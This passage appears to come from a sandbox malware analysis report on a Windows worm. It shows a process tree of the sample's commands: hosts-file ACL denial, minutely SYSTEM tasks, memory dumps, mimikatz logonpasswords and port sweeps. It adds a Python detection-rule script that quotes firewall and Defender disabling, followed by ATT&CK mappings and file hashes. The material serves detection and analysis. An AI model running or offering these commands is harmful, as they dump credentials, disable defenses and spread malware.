        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    [2] PID 2600  C:\Windows\TEMP\mfckutrue\ligfuakbd.exe  cmdline: C:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 1664 C:\Windows\TEMP\mfckutrue\1664.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    [2] PID 1604  C:\Windows\TEMP\mfckutrue\ligfuakbd.exe  cmdline: C:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 536 C:\Windows\TEMP\mfckutrue\536.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    [2] PID 2412  C:\Windows\TEMP\mfckutrue\ligfuakbd.exe  cmdline: C:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 4428 C:\Windows\TEMP\mfckutrue\4428.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    [2] PID 4540  C:\Windows\TEMP\mfckutrue\ligfuakbd.exe  cmdline: C:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 1912 C:\Windows\TEMP\mfckutrue\1912.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    [2] PID 220   C:\Windows\TEMP\mfckutrue\ligfuakbd.exe  cmdline: C:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 4760 C:\Windows\TEMP\mfckutrue\4760.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
    [2] PID 1144  C:\Windows\TEMP\mfckutrue\ligfuakbd.exe  cmdline: C:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 3548 C:\Windows\TEMP\mfckutrue\3548.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    [2] PID 3672  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd.exe /c C:\Windows\mfckutrue\tbejirgpe\scan.bat
        [3] PID 2368  C:\Windows\mfckutrue\tbejirgpe\iljtkedpu.exe  cmdline: iljtkedpu.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
            - Executes dropped EXE
            - Drops file in Windows directory
            note: a second scanner with a <proto> <start> <end> <port> <threads> /save argument form: TCP/7001 (the default WebLogic listen port) across 191.101.0.0/16, results saved to disk. scan.bat itself is not shown in the report.
    [2] PID 4384  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        [3] PID 3248  C:\Windows\SysWOW64\cmd.exe   cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        [3] PID 1140  C:\Windows\SysWOW64\cacls.exe cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
        [3] PID 1752  C:\Windows\SysWOW64\cmd.exe   cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        [3] PID 3604  C:\Windows\SysWOW64\cacls.exe cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
        [3] PID 3924  C:\Windows\SysWOW64\cmd.exe   cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        [3] PID 1600  C:\Windows\SysWOW64\cacls.exe cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM

[1] PID 1624  C:\Windows\SysWOW64\ogiqci.exe
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

The remaining roots are the minutely scheduled tasks firing (64-bit cmd.EXE from System32, running as SYSTEM, matching the /tr strings above):

[1] PID 4356  C:\Windows\system32\cmd.EXE  cmdline: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\kbejuig.exe
    [2] PID 4420  C:\Windows\ime\kbejuig.exe
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
[1] PID 2580  C:\Windows\system32\cmd.EXE  cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ycubiyfde\kayllc.exe /p everyone:F
    [2] PID 1352  C:\Windows\system32\cmd.exe    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    [2] PID 800   C:\Windows\system32\cacls.exe  cmdline: cacls C:\Windows\TEMP\ycubiyfde\kayllc.exe /p everyone:F
[1] PID 2448  C:\Windows\system32\cmd.EXE  cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\mitbajei\kbejuig.exe /p everyone:F
    [2] PID 208   C:\Windows\system32\cmd.exe    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    [2] PID 4188  C:\Windows\system32\cacls.exe  cmdline: cacls C:\Windows\mitbajei\kbejuig.exe /p everyone:F
[1] PID 208   C:\Windows\system32\cmd.EXE  cmdline: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\kbejuig.exe
    [2] PID 5328  C:\Windows\ime\kbejuig.exe
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
[1] PID 5332  C:\Windows\system32\cmd.EXE  cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ycubiyfde\kayllc.exe /p everyone:F
    [2] PID 5160  C:\Windows\system32\cmd.exe    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    [2] PID 2556  C:\Windows\system32\cacls.exe  cmdline: cacls C:\Windows\TEMP\ycubiyfde\kayllc.exe /p everyone:F
[1] PID 5404  C:\Windows\system32\cmd.EXE  cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\mitbajei\kbejuig.exe /p everyone:F
    [2] PID 5696  C:\Windows\system32\cmd.exe    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    [2] PID 5704  C:\Windows\system32\cacls.exe  cmdline: cacls C:\Windows\mitbajei\kbejuig.exe /p everyone:F
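The command lines in this tree are the most portable detection material in the report: the file names are random, but the hosts-file ACL denial, the IPsec block filters, the firewall and service tampering, the minutely SYSTEM tasks, the ProcDump-style dumps, the mimikatz invocation and the masscan-style sweep all have stable argument shapes. The following is an added example, not code from the sandbox or the sample: a small rule set applied to process-creation events (PID, command line) constructed from the lines above, with rule names and tactic labels that are my own rather than the sandbox's signatures. It also shows that the activity spans credential access and discovery, which the ATT&CK mapping below does not list.

```python
"""Command-line detections for the behaviour recorded in the process tree.

Added example; not part of the sandbox report or the sample. EVENTS is
constructed from command lines quoted in the tree (PID, command line); the
rule names, regexes and tactic labels are my own, not the sandbox's signatures.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    cmdline: str


# (rule name, tactic label, regex applied to the lower-cased command line)
RULES = [
    ("hosts_file_acl_denied", "defense_evasion",
     r"cacls\s+\S*drivers\\etc\\hosts\s+.*?/d\s+(users|administrators|system)"),
    ("ipsec_block_smb_rpc", "defense_evasion",
     r"netsh\s+ipsec\s+static\s+add\s+filter\b.*\bdstport=(135|139|445)\b"),
    ("firewall_disabled", "defense_evasion",
     r"netsh\s+(advfirewall\s+set\s+allprofiles\s+state\s+off|firewall\s+set\s+opmode\s+mode=disable)"),
    ("security_service_stopped", "defense_evasion",
     r"\bnet1?\s+stop\s+(windefend|mpssvc|sharedaccess|wuauserv)\b"),
    ("security_service_disabled", "defense_evasion",
     r"\bsc\s+config\s+(windefend|mpssvc|sharedaccess|wuauserv)\s+start=\s*disabled"),
    ("minutely_system_task", "persistence",
     r"schtasks\s+/create\b.*?/sc\s+minute\s+/mo\s+1\b.*?/ru\s+system\b"),
    ("world_writable_payload", "persistence",
     r"cacls\s+\S+\.exe\s+/p\s+everyone:f\b"),
    ("procdump_style_minidump", "credential_access",
     r"-accepteula\s+-mp\s+\d+\s+\S+\.dmp\b"),
    ("mimikatz_logonpasswords", "credential_access",
     r"privilege::debug\b.*\bsekurlsa::logonpasswords\b"),
    ("masscan_style_range_scan", "discovery",
     r"-p\s+\d+\s+\d{1,3}(?:\.\d{1,3}){3}-\d{1,3}(?:\.\d{1,3}){3}\s+--rate=\d+"),
]
COMPILED = [(name, re.compile(rx)) for name, _tactic, rx in RULES]
TACTIC = {name: tactic for name, tactic, _rx in RULES}

# Constructed from the tree above; the last three are benign-looking controls
# (WinPcap service restart, the filteraction line without ports, the ping delay).
EVENTS = [
    (4392, r'cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM'),
    (2176, r'netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP'),
    (1752, r'netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP'),
    (1712, r'C:\Windows\mfckutrue\tbejirgpe\crtyfytge.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\mfckutrue\tbejirgpe\Scant.txt'),
    (1144, r'C:\Windows\mfckutrue\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit'),
    (5044, r'schtasks /create /sc minute /mo 1 /tn "ugtpugmje" /ru system /tr "cmd /c C:\Windows\ime\kbejuig.exe"'),
    (432,  r'C:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 776 C:\Windows\TEMP\mfckutrue\776.dmp'),
    (1984, r'netsh firewall set opmode mode=disable'),
    (1276, r'netsh Advfirewall set allprofiles state off'),
    (4436, r'C:\Windows\system32\net1 stop WinDefend'),
    (2052, r'sc config MpsSvc start= disabled'),
    (800,  r'cacls C:\Windows\TEMP\ycubiyfde\kayllc.exe /p everyone:F'),
    (4220, r'net stop npf'),
    (4368, r'netsh ipsec static add filteraction name=BastardsList action=block'),
    (4332, r'ping 127.0.0.1 -n 5'),
]


def scan(events):
    """One Finding per (event, rule) pair whose regex matches the command line."""
    findings = []
    for pid, cmd in events:
        low = cmd.lower()
        for name, rx in COMPILED:
            if rx.search(low):
                findings.append(Finding(name, pid, cmd))
    return findings


def summarize(findings):
    """Hit count per rule."""
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


def tactics_hit(findings):
    """Distinct tactic labels touched; several tactics from one host in a short
    window is the signal, since sc config or schtasks alone have admin uses."""
    return {TACTIC[f.rule] for f in findings}


if __name__ == "__main__":
    found = scan(EVENTS)
    for f in found:
        print(f"{f.rule:28s} PID {f.pid:<5d} {f.cmdline[:70]}")
    print(summarize(found))
    print(sorted(tactics_hit(found)))
```

Rules are matched with `search` on the lower-cased command line so argument order inside a line does not matter beyond what each regex pins down; the `netsh ipsec ... add filteraction` line deliberately does not match the filter rule, because the `\b` after `filter` stops it, and `net stop npf` does not match the service rule.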
MITRE ATT&CK Enterprise v15 (technique: count)
Persistence
  Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001): 1
  Create or Modify System Process: Windows Service (T1543.003): 1
  Scheduled Task/Job (T1053): 1
Privilege Escalation
  Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001): 1
  Create or Modify System Process: Windows Service (T1543.003): 1
  Scheduled Task/Job (T1053): 1
Defense Evasion
  Impair Defenses: Disable or Modify System Firewall (T1562.004): 1
  Modify Registry (T1112): 1
Downloads
-
Filesize 95KB
MD5 86316be34481c1ed5b792169312673fd
SHA1 6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA256 49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA512 3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize 275KB
MD5 4633b298d57014627831ccac89a2c50b
SHA1 e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256 b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA512 29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize 33.4MB
MD5 c2a4f1db1177f38daadaa9752e404a1a
SHA1 1a5bacb089c21c5fb4786c8d424dd3d497c064e0
SHA256 0c5a796e2b7895342de9bb445d53d24568ebe5210ad4d86351f0eb7d53e022b1
SHA512 8138b93720f681cfb3eb2cc5535de31f5eaff041654a1377ee64e89ba7d6bc848c5c607aa6f222af5dd83a3e5adb87da22a9e50c49d7974fce44e5d1a0b77b39
-
Filesize 26.3MB
MD5 297970b4686972ef66120c56be3df199
SHA1 6359970b4886325766e86d29e8403831362a2a50
SHA256 13f33f2330537cec1ecac944c8037df124920eeabbb70f2a44a1c6dffc9fd89b
SHA512 38a5f2b91032aef235040d83fc7e4f1d50e58e3201bd22bf62c5c4c7a314589365ff6875aba97cc5e6ca8d1c192b23c2ac62bb2b6b59bea0525dc930bc910b04
-
Filesize 4.2MB
MD5 ad188d78e445375cb18d5017379ff104
SHA1 50338378e55382f1dc6ab5c66f62cb1e735881c6
SHA256 593a1a10e8f2169d3ea13e5559f4cd6d3467aa02d9157047b49eb2d59b7e0bd6
SHA512 d5354de73c1a78d7be40c1a26942a30bf12c8106b6170be5dc0d4152a95ddeda1eab92d8a2c57061c095cab55fa7212c7f466fda8961978e2400bd81e4d0f399
-
Filesize 3.9MB
MD5 42b588ad6686c4cb74caf45fbfca6562
SHA1 abbbad5268dc86f19db7a95bae685cb75b317ffc
SHA256 17943ae78b50b82f89c9837783949f97033fa9685d6d1d05561df80682f90039
SHA512 f2f2de9ec483c36c788307acf64086dc673cab4e6475e0057c1119ddb9ca2c16ea41c40e7628037004649a0558441d3946c932144742763ed42afda72518e15e
-
Filesize 2.9MB
MD5 8ac866850dc5abca95f5460d860b9072
SHA1 a2d4538cf7c608c42a94f16ccb4e8093780be341
SHA256 ce9bf67118e22f24622285276b9063dbefcd9b6ee6ab9d61b7bcf361c751377b
SHA512 c9cb98700264b9cd7d11101325cc956be49e3fa6b79de992a44e5f9aa0b937830350bcdfdbeebaef93feeb20c08e215c915c0875bfeb9b7316f5b75605010845
-
Filesize 7.5MB
MD5 f76a319f0d77e0df4d0264ebd1bda2cb
SHA1 e533bb6675d74a18617898ce678967f12e663a12
SHA256 375eceecee9315c7e5365af004c4055f3dd1f6648befcff1d80333a8c4a1467c
SHA512 c9696c9c9b385a25c3fce3a6eb3cbcc7a1747272a6e8dbf1079e4cc92cbcd69596b90a0db172319a3b6d306eb11b1b019412632c5bbf5da8399d13ace4c0990a
-
Filesize 814KB
MD5 db3af7fa8940998f3a48314fbe8f2614
SHA1 aa187a9d113356e001e4ed8b8c4eb407f8e1309d
SHA256 67259ed417e7023a1cd70ec18d693df0c3c9e1d0bcc32c2dd0b1e9eb1b03f223
SHA512 e0a36c650cdc7a2a7f961b687da8e2d38fd32435f31ea4050d6d869f59a49d1d7b0f491a5d53d5f8774bcf269ba78840c5ac9395d5c70c82dd2d4b00e828cb2f
-
Filesize 2.4MB
MD5 488ed803504f1f35b2ee4b7240526606
SHA1 a682b4e9ab09e5ab8e7d6c336458d50439abaae5
SHA256 d1192f7f44b98c1a0dd5dfee5d03e7623e5e77dd5f603903afb614496dcbba2a
SHA512 0f75ddf47143d5a567d7e467a70519a0dae92705a6dd94181765caac6c7518150076ef541daad8c7445f5989aefb093efac3b12d56fbd140c6368f091c962bdf
-
Filesize 20.4MB
MD5 f0923bbb6be0da97d8bd4b3564cb830d
SHA1 eb491cfd7a3171e052c39ca596f5cf264ba834f4
SHA256 fbce8b196d88306f2ec746b9e8241a9bf7eca2dfe44ab8879b5b3517a94f2550
SHA512 e695070076a8cc47b97a687228b980b65044532d40d9f338974e364137ae1bdfb77ca127707b820d49dc2db218614fbe9cbf0f490f0f101232673aefc7c0b028
-
Filesize 4.2MB
MD5 8ece81d36d252cfee01c68706238e674
SHA1 ffe870e55d26c2b8fba49bd445dbc4bb2aada495
SHA256 28fd69e0db586a96d6a3295a59fdea4f5ac6431ffb7af90b8b261abbede3242b
SHA512 8a660de4c96f88d82f91bdf77d40cf59d6baf87ffcaf3249fe408c7233dc18761994b70ec48bcc43cde03fbe5ac94db462d9050f23f1bbcd3261f27002581182
-
Filesize 44.0MB
MD5 fc3d6c340084f5aaeb7a44cb47440c6d
SHA1 524d5b1c581607b5235a9c416edf81a1a23a6039
SHA256 7c2dafccce179416ca769aa4b2fcf5417b5f840346b1a43254d3f1954a26f67e
SHA512 7bdba8b207bf30a0743cf3c609073af9a96df346060fa2d4903b0f25cc5834cecd245b4ef0181d7c86d2b013255dca4976b0b1f240ed78d3b7419fdc03541ddb
-
Filesize 8.6MB
MD5 9f0307f29acbaf2f4fb8e8a86b43d304
SHA1 e9d71f51c1560ee425565f3b3b8d2fc41e769b66
SHA256 3fccff30b4b8c8cce143bd23a11c5f85232b4e32b7b0a3d4c2ce13383a736350
SHA512 a6842a3a94f3189cc44081074ab2433a5173fe87b512259b4521086af4a76b4566065e1882a874407ebb1198cfa767a9017179a71d950d544a4a7ef529daf1da
-
Filesize 1.2MB
MD5 5644c62a6a1c91d2bd58f14075f3288f
SHA1 b3785bc39ba480da08f9b9ba3fc342f3094fefe5
SHA256 c9db09af8d60a9c97ddef54d3ae66190ff11835c1cb2f1b7dd108ba61cb5f317
SHA512 894cc96bcff47f179d95d931f682d03c8735aad354f8af28f8000b03f409a5c179c970ff965d06c52b004ce1caeef64e8db51b4439604c7158080b7c3a204b44
-
Filesize 1.9MB
MD5 2fdc0b38fa8ba34a7162d9d5bb7fc5c3
SHA1 648e3770e7fbe84948da186d3f529e3d2c8b7f65
SHA256 573900663ef3c20d9dfa14e430417e17a97f45bb949be82c98868f290872305b
SHA512 1d4d6caf83ed15fd14bbed4bb656124fdb272b8f614482b08da004575bd01bef6872642875a0507f8af84fe0d3f7875502a17dfcad4a8e4b4c1377eaa1372f5b
-
Filesize 693B
MD5 f2d396833af4aea7b9afde89593ca56e
SHA1 08d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256 d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA512 2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize 126KB
MD5 e8d45731654929413d79b3818d6a5011
SHA1 23579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256 a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512 df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize 11KB
MD5 2ae993a2ffec0c137eb51c8832691bcb
SHA1 98e0b37b7c14890f8a599f35678af5e9435906e1
SHA256 681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA512 2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize 6KB
MD5 b648c78981c02c434d6a04d4422a6198
SHA1 74d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA256 3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512 219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize 72KB
MD5 cbefa7108d0cf4186cdf3a82d6db80cd
SHA1 73aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA256 7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512 b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize 343KB
MD5 2b4ac7b362261cb3f6f9583751708064
SHA1 b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256 a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512 c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize 381KB
MD5 fd5efccde59e94eec8bb2735aa577b2b
SHA1 51aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256 441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA512 74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize 332KB
MD5 ea774c81fe7b5d9708caa278cf3f3c68
SHA1 fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA256 4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA512 7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize 424KB
MD5 e9c001647c67e12666f27f9984778ad6
SHA1 51961af0a52a2cc3ff2c4149f8d7011490051977
SHA256 7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA512 56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize 17.3MB
MD5 da683de68667dd4253fa1d7062a50c32
SHA1 2b926b6103f563f46afa3b9f2dad08b6d966b7bc
SHA256 08b8abf676a8c69b70e3befb0c298b50107b3189e8c8d5469da068dc5bb1aefe
SHA512 1c5506535bca4bc06ace392b2b7c59aefb4043b887931c0d21f8e24c131989a4fcabbf904da1168a17d7005f1ca67b6545401a1d3eabf97102d652030a0f2977
-
Filesize 1KB
MD5 c838e174298c403c2bbdf3cb4bdbb597
SHA1 70eeb7dfad9488f14351415800e67454e2b4b95b
SHA256 1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512 c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376